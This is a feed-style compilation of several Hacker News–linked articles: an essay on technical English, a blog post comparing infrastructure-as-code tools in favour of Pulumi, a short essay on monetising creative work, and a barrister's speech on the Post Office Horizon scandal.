    Ultimately, while CSM generates high quality conversational prosody, it can only model the text and speech content in a conversation—not the structure of the conversation itself. Human conversations are a complex process involving turn taking, pauses, pacing, and more. We believe the future of AI conversations lies in fully duplex models that can implicitly learn these dynamics from data. These models will require fundamental changes across the stack, from data curation to post-training methodologies, and we’re excited to push in these directions.

    Join us

    If you’re excited about building the most natural, delightful, and inspirational voice interfaces out there, reach out—we’re hiring. Check our open roles.

    ]]>
    https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice hacker-news-small-sites-43221377 Sat, 01 Mar 2025 17:16:35 GMT
    <![CDATA[Technical English is nobody's mother tongue]]> thread link) | @remoquete
    March 1, 2025 | https://passo.uno/native-english-tech-writing/ | archive.org

    The part of my brain that rages against injustice stirs like a slumbering dragon when I read the words “Native English”. As a speaker of English as a second language, I find native to be a rather inadequate, if lazy, choice as an attribute meant to describe linguistic proficiency. You’re born with eyes, but that doesn’t automatically make you a competent watcher; you acquire a language, but that doesn’t automatically turn you into a competent writer.

    While it’s true that “native speaker” commonly refers to the first language one acquires as a human being, the same folks who ask for 10 years of experience in a 5-year old tech usually conflate first language and high proficiency when writing job ads. This is a gross mistake, and one that linguists have been debating for a while. Abby Bajuniemi, a cognitive linguist and researcher, elegantly summarized this when I first posted about this topic on LinkedIn:

    The word “native” speaker is contentious these days among SLA scholars–more folks are moving to first language or something similar. Excluding people for whom a language is a second, third, etc. language just because it’s not their first language when they have high competency is silly. Linguists researching language acquisition think deeply […] about how we define levels of competency in any language.

    The issue only gets worse when one stops and thinks about what flavor of English job ads are referring to. Having acquired English as a first language is sometimes not enough if one doesn’t speak the most prestigious among the 160 dialects of English. Are you from Lagos or Karachi? Tough luck: your English isn’t considered “native” enough for some. This highlights that accent discrimination exists and it’s a pretty big problem in the workplace.

    Doing better than this is not that hard. Just replace native with expert or highly competent and check written samples instead of looking for the place of birth of candidates.

    Technical English is a second language for pretty much everybody

    Nobody grows up writing technical English or speaking Simplified Technical English with mum and dad. The language I use to write documentation is a subset of academic English with very few colloquial intrusions and a sprinkle of product-specific jargon that is treated as a foreign body. A solid command of vernacular English is obviously beneficial to my work – if only to ease communication with subject-matter experts, but I wouldn’t say it’s mandatory.

    One might argue that speakers of English as a second language (ESL) are free from the kind of idiomatic interference that first language speakers must keep in check. Technical English aims for clarity and precision, and ESL speakers focus on using the language as if it was code or music notation rather than the language you use every day with family and friends. We tend to write more deliberately and with greater awareness of potential ambiguities.

    Like coders, technical writers are often proficient in more than one language. In my case, I speak four languages at what you’d call a native level of proficiency (English, Italian, Catalan, and Spanish). This linguistic diversity helps me navigate the complexities of global audiences and localization hurdles. It also helps me frame Technical English as what it is: a language that’s second for everybody, including speakers of English as a first language.

    Communication skills matter more than the language you speak

    Even before the advent of large language models (LLMs), I noticed something interesting about software development: the most skilled programmers are great at thinking about software design, application logic, and other systemic aspects of development. They think the choice of a language is but an implementation detail: they pick one or another to adapt to certain ecosystems or platforms, but they’d equally code using sticks if necessary.

    Something similar is going to happen soon with technical writing: with AI-assisted writing, editing, and translation, your proficiency in a specific human language will matter less than your ability in building effective technical communication solutions. It was already like this, but the fact that the code editor I use at work, Cursor, can complete impeccably idiomatic sentences just by hitting the Tab key means that I don’t need to be Hemingway.

    In technical documentation, language is a circumstance, an implementation detail. We use English because it’s the lingua franca of technology at the moment, and because most software is being produced, or innovated, in the Anglosphere. For all I know, the main language of tech comms could be Chinese, Hindi, or Indonesian in 2049. The democratization of English through LLMs and AI agents will only facilitate this sort of lateral movement.

    The next tech revolution might come from Bangalore, Shenzhen, or São Paulo. The companies best positioned to understand, document, and build upon these innovations will be those with diverse technical writers who can bridge linguistic and cultural divides. In a world where LLMs handle the mechanical aspects of language production, the truly valuable skills become cross-cultural communication and technical comprehension.

    All else is campanilismo.

    ]]>
    https://passo.uno/native-english-tech-writing/ hacker-news-small-sites-43221107 Sat, 01 Mar 2025 16:50:10 GMT
    <![CDATA[Infrastructure as Actual Code]]> thread link) | @ASamsig
    March 1, 2025 | https://asamsig.com/blog/infrastructure-as-actual-code | archive.org

    12 minute read

    #iac#programming


    Setting the Scene

    My first introduction to Infrastructure as Code (IaC) must have been back in 2016. We were exploring AWS for the first time in my team, and we were using CloudFormation with its JSON-formatted templates. I'm pretty sure this was before the YAML-formatted templates were even a thing since that wasn't launched until September 2016.

    Anyway, as a developer, I'm used to writing code. I follow "best practices", such as Don't Repeat Yourself (DRY), by using variables, methods, and abstracting where necessary. I also try to keep it as easy to read, understand, and maintain as possible. Sometimes, that includes comments in my code, usually to explain the rationale behind certain choices or highlight potential gotchas.

    Yes, yes, not everything should be abstracted, You Aren't Going to Need It (YAGNI), and all that.

    Well, you see... The problem with most IaC solutions is that they are actually configuration disguised as code. They sprinkle a narrow set of functions and utilities on top of the configuration language and call it a Domain Specific Language (DSL).

    What happens next is a tale as old as time. The functions and utilities are not enough, and the creators have to keep band-aiding this horribly thought-out mess they've created. This is how you end up with a badly designed mess of a DSL, with some resemblance to a programming language. This is true for CloudFormation, Terraform (HCL), ARM, and Bicep.

    There must be a better way, right? Well, I think there is, but first, let's take a look at some of the problems with the current state of affairs.

    JSON as a Configuration Language

    JSON is not a configuration language; it is a data-interchange format. While it is convenient, widespread, well-known, and available in just about all languages, it simply is not a good fit for writing configuration.

    My first issue with JSON as a configuration language is that it lacks comments. Comments are often needed in configuration files, especially when overriding default values and why you potentially did that. Also, when working on a remote machine, quickly commenting out a line of code and restarting the service beats having to delete a line of code.

    It isn't well-suited for humans either; it involves a lot of braces, commas, and quotes, making it hard to read and write by hand at scale. For example, when defining an array, you might leave a trailing comma, which is invalid JSON.

    CloudFormation

    As I wrote earlier, my first introduction to CloudFormation was with the JSON syntax. I don't think I'll never forget the first time I had to create a string from the output of two resources. It required figuring out how to use a combination of Fn::Join, Fn::Split, Fn::Select, and Ref.

    It was way more of a challenge than manipulating a string has any right to be. Also, it isn't like you're going to be able to use a debugger when it goes wrong. If those hellish-looking functions aren't familiar to you, here is the documentation for CloudFormation's so-called intrinsic functions.

    Take a look at this snippet below, taken from AWS's examples repo.

    {
      "OriginAccessControl": {
        "Type": "AWS::CloudFront::OriginAccessControl",
        "Properties": {
          "OriginAccessControlConfig": {
            "Name": {
              "Fn::Join": [
                "",
                [
                  "rain-build-website-",
                  {
                    "Fn::Select": [
                      2,
                      {
                        "Fn::Split": [
                          "/",
                          {
                            "Ref": "AWS::StackId"
                          }
                        ]
                      }
                    ]
                  }
                ]
              ]
            }
          }
        }
      }
    }
    

    I mean... just woah, that is so horrible. The amount of indentation and brackets is simply astounding. Those brackets are simply not helpful for anyone but computers.

    This was my first experience with IaC, so to say that I was excited about alternatives is an understatement. At this point, we haven't even talked about actually deploying CloudFormation, which is a whole other nightmarish experience.

    To be fair, it is considerably more readable in YAML, but that is not saying much. Here is the same snippet
    in YAML. But look at those double dashes...

    OriginAccessControl:
      Type: AWS::CloudFront::OriginAccessControl
      Properties:
        OriginAccessControlConfig:
          Name: !Join
            - ""
            - - rain-build-website-
              - !Select
                - 2
                - !Split
                  - /
                  - !Ref AWS::StackId
    

    The fundamental issues with CloudFormation run way deeper than just syntax, and YAML can't fix that. This whole thread on HackerNews is such a throwback to the days when I was using CloudFormation myself. Who doesn't miss a little ROLLBACK_FAILED in their lives?

    Just to make something clear before we proceed: I'm not saying that YAML is good, just that it is better than JSON.

    Constraints won't set you free

    When using a DSL like CloudFormation, I always reach a point, where I get utterly frustrated, wanting to do something simple, that is usually done in a few lines of code in ANY real language, but with the DSL, it feels like you're wearing a straitjacket, especially because it feels like you're going crazy at the same time.

    You have to visit the documentation again and again, and for the most part, you end up copying/pasting samples. You try to make as few adjustments as possible, as you fear the dreaded feedback loop that comes with vendor IaC tools (Bicep, CloudFormation), where the decision engine is owned by the cloud provider.

    It seems to me, that the people who are sold on these kind of DSLs, are the people who can't code. They don't want to make an investment as big as learning to code. So they fool themselves into thinking that using a DSL is less work. The only thing they end up doing, is shoehorning themselves into a corner.

    They then have to cling on for dear life, hoping that it has staying power, as everything they've learned is useless if it doesn't.

    Case in point the Puppet language.

    It is time to stop the cope.

    The case for using a programming language

    Using a DSL with a configuration language usually means you won't have any proper tooling like you usually would with a programming language.

    This means that your IDE can't help you, unless a Language Server Protocol (LSP) or similar is implemented. Without proper tooling you won't have any autocomplete, syntax highlighting, auto formatting, refactoring, code navigation, easy separation of units, debugging or any such things.

    If only something existed from before that had all those wonderful features. That people could use to express complex instructions; perhaps it could even be Turing-complete, I don't know, something like a PROGRAMMING LANGUAGE?

    It really makes you wonder if people do not realize why TypeScript has gained so much popularity. It is all about the tooling. It actually makes it pleasant to write JavaScript (for the most part). You avoid a lot of errors, by simply having static typing.

    Terraform (HCL)

    Terraform uses its own custom configuration language, HCL. Luckily for HashiCorp, HCL managed to become popular enough that now tooling is widespread enough, but a 2.5-star rating for their VS Code plugin... Yikes!.

    A problem remains, though, HCL will not be familiar to anyone who has not written Terraform before because no one else uses it, and no one else is going to, let's be real. Funnily enough, GitHub used it early on for GitHub Actions but retired the HCL syntax and switched to YAML.

    Personally, HCL works well for Terraform, it is a lot better than JSON, but it still gets hairy, when you start introducing, loops, and conditionals, also, you're still at the mercy of built-in functions, and utilities.

    It manages our little string manipulation pretty smoothly, though. This is what the snippet from the previous section looks like in HCL.

    resource "aws_cloudfront_origin_access_control" "oac" {
      name = join("", ["rain-build-website-", split("/", var.stack_id)[2]])
    }
    

    But for me it all falls apart so easily. I don't feel like I need to give too many arguments, when you can just look at the ecosystem surrounding Terraform. Would you really need the likes of Terragrunt, if it wasn't for the limiting DSL?

    Let me put their headline from their website here:

    "DRY and maintainable OpenTofu/Terraform code." - Terragrunt

    Indicating that Terraform is not DRY nor maintainable without? Their words! Not mine! Okay, okay, I jest, maintainable sure, but DRY?

    Let's move on to deeper issues.

    Imagine you needed to create a UUID, you quickly check the documentation, and you find the built-in uuid-function, but wait, what does it say.

    "The function generates a well-understood string representation of a 128-bit value, but the output is not RFC-compliant."

    What does that mean? Oh no..., it generates a random string formatted as a UUID, but it is not RFC-compliant... What were they thinking?

    The "best" way for you to fix that, is to make your own provider, or find a provider that works properly, but let us be honest, perhaps executing a shell script is easier?

    data "external" "generate_uuid" {
      program = ["sh", "-c", "uuidgen"]
    }
    

    I'm being facetious here, trying to get a point across.

    Using actual code

    One of the primary advantages of using a programming language is that you can leverage that language's ecosystem, be it tooling, libraries, or community.

    When you have an IaC tool, that is designed to be used from a programming language, it can unlock new possibilities. It is time to introduce Pulumi. It fulfills everything I've been talking about this whole time, did you perhaps see it coming?

    First things first, here is what our mundane snippet from the previous section looks like in Pulumi using TypeScript.

    import * as aws from "@pulumi/aws"
    import * as pulumi from "@pulumi/pulumi"
    
    const oac = new aws.cloudfront.OriginAccessControl(
      `rain-build-website-${pulumi.getStack().split("/")[2]}`
    )
    

    Quite simple, easy to read, and easy to understand. Discoverability is also great because of the common dot-notation, allowing you to easily discover what members are available on objects.

    Here are some of the unique features that Pulumi offers:

    • Dynamic providers
    • Function serialization
    • Automation API
    • Avoiding plaintext secrets in your state

    A dynamic provider, is a provider defined directly in your code. It doesn't have to be packaged, it doesn't even need to live in a separate file. All you have to do it implement a create, and a delete, or if you want to go the whole way, you can do the full CRUD, for a fully managed life-cycle.

    For more detailed information, check out the documentation for dynamic providers here.

    You also have function serialization. I'm still not entirely sure, if they are a good idea to use in production, as they involve a lot of moving parts, with a lot of caveats, and possible footguns, but it is a very impressive feature nevertheless. Basically, you can write an inline Lambda function, and Pulumi will take care of the packaging.

    Perhaps the biggest killer feature of Pulumi is the Automation API, which allows you to programmatically use Pulumi to provision resources. With for example Terraform, you'd end up calling the CLI via a shell script or some other means. With Pulumi, you can do it in code, which makes it ideal for building tooling that provisions infrastructure, building a full-blown Internal Developer Portal, or some other tool that needs to manage infrastructure.

    Pulumi has amazing support for handling secrets and encrypting them in the state file. It is honestly mind-boggling that Terraform doesn't support it, and no encrypting your state file at rest is not the frigging same. A recent development in Terraform is what they call ephemeral values, which can be used to alleviate some of the issues, with secrets in state, but encrypting secrets like Pulumi does, is still far superior.

    Why not Terraform CDK, AWS CDK, etc.?

    The fundamental issue with Terraform CDK, AWS CDK, and other similar tools, is that they are not actually built as Infrastructure as actual Code. They are merely abstractions that translate to their original data interchange format. This means that are not actually innovating at all, merely playing an impossible game of catch up.

    In the case of AWS CDK and the future Azure CDK, they will never even solve the fundamental problem of the cloud provider owning the actual decision engine. They are simply a hack or workaround to solve the issue of picking a configuration language to begin with.

    Conclusion

    I'm not saying that Pulumi is the objectively best IaC tool out there, but it is really powerful if you know how to code. Even if you don't need the superpowers it can provide, it is still much better at reducing duplicate code, and extracting common patterns, than any configuration language.

    I urge you to try it out, and see for yourself. Even if you don't know how to code, perhaps you'll find out, that it isn't so difficult after all, especially with the help of good tooling.

    Forget about the cloud-specific IaC tools. There is simply no good reason to use them.

    With the cloud provider owning the decision engine, you're never actually in control. If you're blocked by a bug, you can't contribute to fixing it. Perhaps if you or your company pays the cloud provider enough money annually, they will actually get back to you.

    Third-party IaC tools ship support for new resources really fast. There is no advantage, relying on the first-party tool for early support of new resources / features.

    And most importantly, eventually, you'll want to manage additional infrastructure that is not vendor-specific. This could be DNS records in another registry, or some configuration in a SaaS platform.

    If you're still not convinced, you can always just stick to HCL, and hope that it lasts, hey at least it is better than JSON / YAML, right?

    If you're still not convinced, I could probably be goaded into doing a face-off between your choice of IaC, and Pulumi. You make an implementation in your tool, and I'll make an implementation in Pulumi, and we'll see which one comes out on top.

    Anyways, stay tuned, it is very possible I'll publish more posts about Pulumi, and how I use it.

    ]]>
    https://asamsig.com/blog/infrastructure-as-actual-code hacker-news-small-sites-43220631 Sat, 01 Mar 2025 16:05:58 GMT
    <![CDATA[The Antiportfolio: Counter-Advice for Aspiring Artists]]> thread link) | @smnrg
    March 1, 2025 | https://simone.org/antiportfolio/ | archive.org

    A student performer recently reached out to ask me about transitioning from college to “the real world” while pursuing comedy and video production.

    His eyes lit up describing an intimate dorm room improv show he runs: 20–25 people packed in weekly for pure joy and experimentation. Then came a familiar tension: one friend urged him to monetize it immediately, while another suggested preserving its organic magic.

    There's tremendous pressure to monetize every passion.

    The value of an experience is not equivalent to its market value.

    The Pressure to Monetize

    In the connected but pre-algorithmic world of my late teens and 20s (during my “previous life” in journalism and entertainment) I used to sleep two or three hours a night. I was possessed by an almost manic drive to promote every show, every project, every creative endeavor. At the time, it worked. I brute-forced a network effect around me.

    As I became a modest live radio host & TV/web producer (and a bridge builder between European and American comedy scenes) I thought this relentless hustle was the only path forward for what I loved. Pack 100+ people into venues night after night, publish three videos per week, burn through social media campaigns and flyers–all while trying to nurture the creative spark that drew me to comedy in the first place.

    But there's a darker side to ubiquitous hustle culture.

    Keep the Bots Away

    Join me in preserving a humane pocket of web on the Internet. No essay is paywalled: an email is just the most effective way to keep bots and “AI” scrapers away while you become part of a small community celebrating human writing, photography, and conversation.

    Join & Keep Reading

    Already joined? Sign In

    ]]>
    https://simone.org/antiportfolio/ hacker-news-small-sites-43220477 Sat, 01 Mar 2025 15:54:14 GMT
    <![CDATA[Post Office Trial: Marshall spells it out in a speech to University of Law]]> thread link) | @fanf2
    March 1, 2025 | https://www.postofficetrial.com/2021/06/marshall-spells-it-out-speech-to.html | archive.org

    P. Marshall Esq

    What follows is perhaps the most important speech given on the subject of the Post Office Horizon IT scandal to date. 

    I watched Mr Marshall deliver it remotely yesterday evening on Zoom to a couple of hundred students at the University of Law in London. He has very kindly given me permission to reprint it below.

    The text contains a forensic analysis of the legal, ethical, individual and corporate failures that led the Post Office and the legal profession to do significant harms to hundreds of helpless individuals. 

    The specific humiliations meted out to Janet Skinner, Seema Misra, Lee Castleton and Tracy Felstead are described in detail. The institutional culpability is laid bare. 

    You can listen to the presentation here. The text is below. 

       THE UNIVERSITY OF LAW 

    3rd June 2021

    SCANDAL AT THE POST OFFICE

    THE INTERSECTION OF LAW, ETHICS AND POLITICS

    PAUL MARSHALL

    PART I - INTRODUCTION

    The great historian AJP Taylor in his History of England between 1914 and 1945 observed that, until 1914 the only emanations of the state that most English people would have encountered would have been the policeman and the Post Office.   

    By 1999 the Post Office had a network of about 17,000 branches. It is still, I believe, the largest retailer in the UK.  A Post Office branch operation is considerably more complicated than those of an ordinary high street bank branch.  It sells stamps to insurance and, like banks, deals in foreign currency.   

    I am talking to you today about the most serious series of miscarriages of justice in recent English history.  To put it in tabloid terms, for 20 years the Post Office hijacked the English criminal justice system and used it, essentially as part of the Post Office for its own purposes. In the process, it ruined the lives and livelihoods of hundreds of innocent people.  What I shall try and show, if you can follow my thread, is how ethical failure in business, when it feeds into legal failure by lawyers and judges, becomes incredibly damaging.  When politicians run for the hills and disclaim responsibility for the Post Office, a wholly-owned creature of government, the problem becomes almost insuperable.  If you can’t look to Parliament, what can you do? 

    To understand what I am going to say, you need to know that in 2019 there was a settlement of group litigation brought by 550 claimants against the Post Office.  The settlement figure paid by the Post Office was £57 million.  Most of that sum was paid out in costs and expenses.  Sixty-six of the claimants had criminal convictions.   In March 2021 the Court of Appeal heard 42 appeals of convicted postmasters and employees. It quashed 39 of these on grounds that the Post Office had abused the processes of the court: Hamilton and ors. v Post Office Ltd [2021] EWCA Crim 577. https://www.bailii.org/ew/cases/EWCA/Crim/2021/577.html. The number of those appeals, arising out of similar facts, is without precedent in English law.

    The Court of Appeal judgment is remarkable. This is because, in a finding that is comparatively rare, the Court of Appeal concluded that, not only should the convictions of 39 former postmasters and employees be quashed on grounds of abuse of process, because the appellants did not receive a fair trial, but that, additionally, the Post Office had acted in such a way as to subvert the integrity of the criminal justice system and public confidence in it.  In legal terms this is known as ‘second category’ abuse of process.  It was a devastating finding for the Post Office that it had strenuously resisted.  I claim some credit for this conclusion because, until the end of December 2020, every other lawyer in the case, other than my solicitors Aria Grace Law and my junior, Flora Page, had been opposed to advancing that ground of appeal.  My clients had received a certain amount of flak for persisting in it, because others believed it would fail, even if the Court of Appeal was willing to entertain it, which others thought it well might not. 

    The importance of this finding for the appellants was enormous.  The effect of the Court of Appeal’s finding, given effect in slightly anachronistic Victorian language - that the Post Office’s conduct “offended the conscience of the court”, is that the appellant should not only not have been convicted, but should not have been prosecuted. That is to say, complete exoneration. My pursuit of that issue, and perception that the Post Office’s conduct was much worse than merely failing to give proper disclosure of problems with Horizon, that it conceded in October 2020, is what eventually enabled me, with Aria Grace, to elicit from the Post Office the “Clarke Advice”, to which I will refer later.

    The day after the Court of Appeal’s judgment, Mrs Paula Vennells, the Post Office’s former CEO, resigned from all her corporate directorial appointments and also gave-up her part-time ecclesiastical appointment.  

    But the many hundreds of miscarriages of justice, now estimated to be around 736 or so, came within a hair’s breadth of not being discovered.  

    It cost upwards of £150 million for the civil litigation to get close to the truth of only a part of what happened.   

    The Post Office and its management were willing to expend vast sums of money, and to instruct the most expensive lawyers that money can buy, to prevent the truth coming out.  They failed, but they easily might not have done. 

    Elsewhere I have suggested that were the English criminal justice system to be an airline, no one would fly it, such is the repeated incidence of disastrous failure.  

    Miscarriage of justice sounds a bit abstract, so let me introduce you to my former client, Tracy Felstead, to give you a flavour of what a miscarriage of justice really means.  A miscarriage of justice is harm inflicted by the state upon an individual.  That is why the judicial oath is both so important and also onerous.  It is not a judge’s promise to do their best.  

    In 2001 Tracy was a recent school-leaver, proud to have secured employment with the Post Office, at that time still a highly respected national institution.  There was a Horizon computer record that showed a shortfall of £11,500 at the till she was working on at her Post Office branch.  Under caution, interviewed by Post Office investigators at Peckham police station, she was asked: "can you demonstrate how you did not steal the money?"  Just reflect on that.  She protested her innocence.  She was prosecuted by the Post Office. There was no evidence she had ever physically taken any money.  The Post Office and Fujitsu objected to the cost of providing the electronic evidence that had been requested by Tracy’s expert witness. In the event the electronic evidence was not provided and her expert, with whom I have spoken and is highly skilled, was not called at her trial.  On 26 April 2002 Tracy was convicted of theft.  She was 19 years old. She refused to apologise when invited to do so by the trial judge, protesting she had done nothing wrong. She was immediately locked-up in a young offenders’ institution.   

    In 2020 Tracy received £17,000 compensation out of the eventual settlement of £57 million, most of which went to pay the claimants’ lawyers’ fees and other costs in the group litigation, the largest component of which was funding costs.  

    Tracy’s conviction was quashed by the Court of Appeal on 23 April 2021. The court found that the Post Office denied her a fair trial in not providing to her electronic evidence.  Prior to an interlocutory hearing in the Court of Appeal, in November 2020, Tracy suffered a nervous collapse, such was the continuing strain on her. The Court of Appeal held that it was an affront to the conscience of the court that Tracy had ever been prosecuted.  For 20 years, in every job interview since her conviction, Tracy had to declare that she was a convicted thief.  Imagine what that would have done for you.  Not one of you would be listening to this talk.

    There are many who bear responsibility for Tracy’s prosecution. Others bear responsibility for it taking 20 years for Tracy, and others like her, to appeal.  The Post Office, including its Chairman, its Chief Executives, its Chief Accounting Officers, its Board, and its Compliance Audit and Risk Committee share responsibility for this catastrophe.  So do a significant number of lawyers and judges who failed to understand and properly evaluate the evidence.  

    One of the features of these miscarriages of justice is that, in almost all cases, the only evidence against the defendant in question was a shortfall shown in the Horizon computer system.   If you remember only one thing from this talk, bear in mind that writing on a bit of paper in evidence is only marks on a piece of paper until first, someone explains what it means and, second, if it is a statement of fact, someone proves the truth of that fact.  

    The simplest explanation for the Post Office scandal is that documents generated by the Horizon computer system were routinely treated by lawyers and judges as though statements of fact that were true, without bothering to consider how their truth should be established.  It was taken as given that what a computer record showed was correct. The shallowness of this approach is reprehensible. 

    That apart, some Post Office lawyers knew of information that would have provided a defence to defendants. Other lawyers knew of information that would have enabled convicted defendants to launch appeals to the Court of Appeal long, long before March 2021. I hope that some of them may end up in prison for perverting the course of justice.  

    At the outset of your careers you will think you will never do this.  Some of those lawyers would have imagined the same thing in their 20s.  You may ask what is it that caused them to lose their way.   I hope to give you some hints as to where the answer lies.

    To start with I need to explain a few dry facts about the Post Office.  Their relevance will become clear.

    The Post Office, though it is a private company limited by shares,  is in truth a creature of the government.  Its entire shareholding is owned by a company called UK Government Investments Limited. UKGI is owned directly by HM Treasury.  The duty of the Board of the Post Office under the Companies Act 2006 is to act in the interests of its shareholder, the government.   There is a government appointed representative on the Board. 

    The accounting officer for the Post Office reports to the accounting officer of the Department for Business Energy & Industrial Strategy or BEIS.  It was previously called the Department for Business Innovation & Skills (BIS).  

    Enterprises such as the Post Office are private enterprises through which the government delivers services.  Sometimes these are called “Arm’s Length Bodies” or more voguishly “Partner Organisations”.  In 2012 the Post Office was separated from the Royal Mail. A key government objective for the Post Office was to make it profitable, because for a long time its activities had been loss-making.  

    Twenty-two years ago, in 1999, the then labour government had brought to an end a PPI procurement project. That project had been to run the state benefits system through the Benefits Agency in collaboration with the Post Office.  It was proposed to run the benefits scheme on a grand computer system called Horizon. Horizon became the largest non-military computer system in Europe.  The project did not go happily and incurred wasted cost to the taxpayer of about £700 million.  It was a fairly conventional failed government IT project.  At a Parliamentary Select Committee in 1999 several government ministers, including  the future Chancellor of the Exchequer Alistair Darling, explained to Members of Parliament that the Horizon computer system was insufficiently tested. It was said that it exposed the government to the prospect of a catastrophe.

    The government decided that a whizzo way of dealing with the problem was to offload Horizon on to the Post Office. This was in the name of modernisation, and to salvage something from the failed procurement project. Fujitsu, the Japanese technology company, that earns billions from government contracts, took over the Horizon computer system and supplied it under a service contract to the Post Office.   

    Some thinkers

    I thought it convenient to mention a couple of thinkers whose thoughts shine a good deal of light upon the Post Office scandal. 

    Carl von Clausewitz was one of the great thinkers on warfare.  He cut his teeth as a staff officer in the Prussian Army in the Napoleonic wars. He wrote down his reflections.  Some of these can readily be transferred to other forms of adversarial activity, including litigation.  One of Clausewitz’s insights is that warfare naturally tends towards an extreme, because of ever-greater effort to overcome your adversary.   He thought that the impediments to the tendency to “absolute war” were what he called “frictional” constraints.  Two of the most important were, first, constraint upon the material resources allocated to the contest – in effect, cost; a second constraint is moral – if you like, the stomach for a fight.  These constraints are themselves affected by the stakes that are in dispute. The greater the importance of the subject of the contest, the greater will be the resources likely to be expended.  If core values are in issue and the dispute is existential, there will be a tendency to extreme conflict. 

    These principles can be seen in operation in the Post Office scandal.  By 2019 the Post Office was willing to deploy more than a hundred million pounds in costs to defending the group litigation brought by 500 postmasters. That is, literally to spare no expense.  Part of the explicit thinking (that the journalist Nick Wallis has recorded) was to wear out the claimants in costs.  The Post Office had effectively unlimited funds, being backed by the government. The prospect of the postmasters succeeding in their claims constituted an existential threat to the entire Post Office business and its brand.  The Post Office, in effect, bet the farm on defeating the 550 group claimants. It lost that bet.  The result is the insolvency of the Post Office.  This is because, without government support, it cannot meet the claims of some 2,400 others who have claimed under a Historic Shortfall compensation scheme set up last year.

    The second thinker I shall refer to is the medieval theologian St Thomas Aquinas.  Aquinas postulated a moral dilemma in a commercial situation. A merchant in a sailing vessel arrived at an island with a cargo that the islanders had not received for many months.  The cargo was accordingly very valuable in the market.  What, however, if the merchant knew that coming behind them was a large number of ships laden with similar cargo?   Were they morally obliged to tell the islanders or could they exploit their ignorance by maintaining a high price?   I will leave that to you to decide,  but what the dilemma illustrates is that ignorance has commercial value.  In law there are a large number of circumstances where the imperative to take advantage of ignorance is powerful.  There is a line that can be crossed.  Ethics can be expensive.  

    This problem lies at the heart of an ethical conundrum and a conflict of interest.  A lawyer owes a duty to their client, but they owe a prior duty to the court.  The problem is that these duties may, and sometimes do, collide.   The higher the stakes the greater will be the temptation to ask, not what course of action is right, but ‘what can I get away with?’  

    As I shall explain, the Post Office scandal, at a high level of abstraction, is explained by the exploitation by the Post Office of ignorance.  The first kind of ignorance exploited was that the Post Office, for 20 years, failed to give proper disclosure of the many known problems with its Horizon system.   

    The second kind of ignorance exploited by the Post Office was in violation of convicted defendants’ Article 6 rights under the ECHR.  Article 6 guarantees a right to a fair trial within a reasonable time. A fair trial includes any appeal. The Post Office concealed from defendants its knowledge, that it acquired in 2013, that would have enabled many appeals long before March 2021.  It did so not by accident, but by a deliberate strategy.  

    PART II – TWO STREAMS OF FAILURE

    The Post Office scandal defies simple analysis because it resulted from two separate streams of failure that each augmented the other.  

    Some will have detected that I stand outside the cheerleading for English justice.  It is indeed the case that if you wish to engage in litigation where expense is of no consequence and you have unlimited resources, English justice will provide the Rolls Royce for your purpose.  For everyone else it provides a mechanism for the resolution of disputes that is ludicrously expensive, fraught with procedural hazard and delivers a result that is frequently unjustifiably unprincipled, and as a result unpredictable.  It also facilitates and encourages what Clausewitz warned of, in connection with war, the tendency to ever greater extremes.  

    First stream of failure - misunderstanding how computers fail

    The first problem that the Post Office litigation painfully exposes is that English judges and English lawyers commonly do not understand the propensity of computers to fail.   

    If you think that’s harsh, in 1997 Lord Hoffmann, universally regarded as a clever judge, loftily declared that no one needs a degree in electronics to know whether a computer is working or not.  The Bates group civil litigation incurred colossal cost in exposing the fallacy of Lord Hoffmann’s observation.  The law treats computers like machines.  But computers are not machines – or at least they are not only machines.  Part of the present problem is that technology advances so rapidly that our means of dealing with it cannot keep pace.  There is more regulation covering the design of a toaster than there is of someone who writes and sells computer software.  

    At a more concrete level, in 2010 at Mrs Seema Misra’s trial, prosecuting counsel opened and closed the case for the Crown by telling the jury that, were there to have been a problem with the Horizon computer system, any such problem would have been manifest and obvious to a Horizon computer terminal operator.   That’s, in effect, Lord Hoffmann’s point.  It’s wrong.

    The Law Commission expressed a similar view in two reports to Parliament in 1993 and 1997. The Commission recommended that safeguards for evidence derived from computers in legal proceedings be removed.  Until 2000, a person relying on computer evidence at a criminal trial was required to prove that the computer was working properly.  The Post Office Horizon scandal tracks exactly the period since the removal of protections previously provided by the Police and Criminal Evidence Act 1984.

    The mischief of the prosecution’s contention was that, by sleight of hand, it put the onus on Mrs Misra to explain to the jury the problems she encountered with Horizon.  All she could actually do was point to shortfalls she had experienced at her Horizon branch terminal – that is, all she could show was that the cash that she had received didn’t match the balancing figure on the Horizon computer screen.  In leaps it had escalated to £75,000.  She called the police and suspected her colleagues of theft.  The transcript of her trial shows that she was close to taunted by the prosecution for her being unable to point to identifiable problems:  ‘Mrs Misra says that there must be a fault with Horizon, but she can’t point to any problem she actually had’.   

    The jury was invited to infer that the only cause of the discrepancy must be theft.  That should never have happened.  Had her trial been conducted properly, the Post Office should have been required to prove that the Horizon system was working at the time she experienced shortfalls.  As we now know from Mr Justice Fraser’s 2019 ‘Horizon Issues’ judgment (Bates and ors. v Post Office Ltd (‘Horizon Issues’) Rev 1 [2019] EWHC 3408 QB. https://www.bailii.org/ew/cases/EWHC/QB/2019/3408.html), the Post Office could not have done so.  Mrs Misra went to prison. She was 8 weeks’ pregnant and it was her son’s 10th birthday. On being sentenced she collapsed.  

    The importance of computer disclosure

    The problem with the Post Office’s litigation and prosecution of its postmasters is that, for 20 years, the Post Office gave wholly inadequate disclosure of known problems with its computer system.  

    The most astonishing aspect of this to anyone technically half-literate is that, until 2019, the Post Office declined to disclose the Fujitsu Horizon Known Error Log.  In the massive group litigation, reported as Bates and Ors. v Post Office Ltd (Horizon Issues) [2019] EWHC 3408, it had three lines of objection to disclosing the Known Error Log (KEL) – a central log maintained to record, as its name suggests, errors in a computer system, their impact, and fixes undertaken to correct them.   

    To start with, the Post Office’s solicitors, in correspondence questioned whether the Known Error Log existed at all.  Mr Justice Fraser concluded that it did.

    Once the existence of the Known Error Log was established, the Post Office’s leading counsel submitted to the court that the KEL was irrelevant and the claimants’ demand for its disclosure was “a red-herring”.  Mr Justice Fraser concluded that the KEL was likely relevant to the claimants’ claims.  

    Once established as existing and likely to be of relevance, the Post Office’s final contention was that, however relevant it might be, very regrettably it could not disclose it because it was not the Post Office’s Known Error Log, but rather Fujitsu’s.   

    Mr Justice Fraser’s response to this, was to point out that, in fact, as a matter of contract between the Post Office and Fujitsu, the Post Office was entitled to the Known Error Log.  

